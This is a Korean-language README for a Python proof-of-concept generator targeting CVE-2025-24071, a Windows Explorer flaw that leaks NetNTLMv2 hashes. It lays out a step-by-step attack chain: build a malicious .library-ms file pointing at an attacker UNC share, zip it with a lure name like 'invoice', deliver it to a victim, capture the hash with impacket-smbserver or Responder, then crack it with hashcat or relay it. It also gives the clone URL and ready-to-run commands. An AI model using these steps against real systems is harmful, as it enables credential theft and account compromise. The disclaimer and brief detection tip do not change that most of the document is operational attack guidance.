
의존성 없는 Python PoC 생성기로, CVE-2025-24071에 대해 ZIP 내에 악성 .library-ms 파일을 생성하여 Windows Explorer NTLM 해시 노출을 유발합니다.
⚠️ 면책 조항: 이 도구는 교육 목적 및 승인된 침투 테스트 전용입니다. 본인이 소유하거나 테스트에 대한 명시적인 서면 허가를 받은 시스템에만 사용하십시오. 무단 사용은 불법입니다.
Windows 파일 탐색기는 특정 파일 형식이 폴더 보기에 나타나는 즉시, 더블클릭과 같은 사용자 상호작용 없이 자동으로 해당 파일을 구문 분석합니다. 영향을 받는 버전은 .library-ms 파일을 적절히 검증하지 못하며, 이 파일은 임의의 원격 SMB 경로를 가리키는 검색 커넥터를 정의할 수 있습니다.
탐색기가 악성 .library-ms 파일이 포함된 폴더를 렌더링할 때(예: ZIP/RAR 압축 파일을 압축 해제한 직후), "라이브러리" 위치를 확인하기 위해 공격자가 제어하는 UNC 경로에 조용히 연결을 시도합니다. 이 SMB 연결 시도에는 피해자의 NetNTLMv2 해시가 포함되며, 지정된 호스트에서 트래픽을 캡처하는 공격자(예: impacket-smbserver 또는 Responder 사용)는 이를 오프라인에서 크래킹하거나 릴레이를 시도할 수 있습니다.
이 저장소에는 이 취약점에 대한 공개 PoC 생성기의 최소한의 의존성 없는 재작성 버전이 포함되어 있습니다. Python 표준 라이브러리만 사용하여 악성 .library-ms 파일을 생성하고 ZIP으로 패키징합니다.
.library-ms 파일은 Windows 탐색기에 원격 또는 로컬 위치의 내용을 "라이브러리"로 표시하도록 지시하는 XML 문서입니다. <simpleLocation><url> 요소는 UNC 경로(\\<host>\<share>)를 가리킬 수 있습니다.
영향을 받는 버전에서 탐색기는 폴더가 표시되는 즉시 이 위치를 확인합니다. 폴더 보기에서 파일이 보이기만 하면 되며, 더블클릭이나 명시적인 작업은 필요하지 않습니다(예: 해당 파일이 포함된 압축 파일을 압축 해제한 직후).
impacket-smbserver, Responder 등)를 실행합니다.\\<attacker_ip>\<share>를 가리키는 악성 .library-ms 파일이 생성됩니다.1. 공격자 머신에서 SMB 리스너 시작
2. \\<attacker_ip>\<share>를 가리키는 .library-ms 파일 생성
3. ZIP 압축 파일로 패키징
4. 피해자에게 ZIP 전달 (업로드 기능, 이메일, 공유 등)
5. 피해자가 ZIP을 풀고 탐색기가 폴더를 렌더링
6. 탐색기가 UNC 경로 확인 -> SMB 인증 시도 -> NetNTLMv2 해시 캡처
7. 해시를 오프라인에서 크래킹 (hashcat -m 5600) 또는 릴레이
os, sys, argparse, zipfile)페이로드를 생성하는 데는 서드파티 의존성이 필요하지 않습니다. 해시를 캡처하려면 공격자 측에 Impacket(impacket-smbserver) 또는 Responder와 같은 SMB 리스너가 필요합니다.
git clone https://github.com/BardLaudian/CVE-2025-24071.git
cd CVE-2025-24071
usage: cve_2025_24071.py [-h] [-n NAME] [-i IP] [-s SHARE] [-o OUTDIR] [-a]
options:
-n NAME, --name NAME Output base filename (no extension)
-i IP, --ip IP Attacker IP to embed as the UNC path target
-s SHARE, --share SHARE Share name (default: shared)
-o OUTDIR, --outdir OUTDIR Output directory (default: current dir)
-a, --affected-versions Print the list of affected Windows versions and exit
python3 cve_2025_24071.py -n invoice -i 10.10.14.5
이 명령은 \\10.10.14.5\shared를 가리키는 invoice.library-ms를 포함하는 invoice.zip을 생성합니다.
impacket-smbserver shared /tmp/smbshare -smb2support
python3 cve_2025_24071.py -n report -i 10.10.14.5 -s data -o ./payloads
python3 cve_2025_24071.py -a
.library-ms 및 유사한 자동 구문 분석 파일 형식을 검사하십시오..library-ms 생성기의 의존성 없는 버전, 새로운 익스플로잇 기법 없음| 필드 | 값 |
|---|
| CVE | CVE-2025-24071 |
| 영향 받는 버전 | Windows 10 (1607–22H2), Windows 11 (22H2–24H2), Windows Server 2012 R2 – 2025 |
| 유형 | 권한 없는 행위자에게 민감한 정보 노출 (CWE-200) |
| 권한 | 없음 (인증되지 않은 공격자, 피해자가 파일을 보거나 압축 해제해야 함) |
| 영향 | NetNTLMv2 해시 노출 → 오프라인 크래킹 또는 NTLM 릴레이 |
| CVSS | 7.5 높음 (GitHub Advisory Database 기준) / 6.5 (MSRC 기본 점수) |
| 패치 | 2025년 3월 패치 화요일 누적 업데이트 |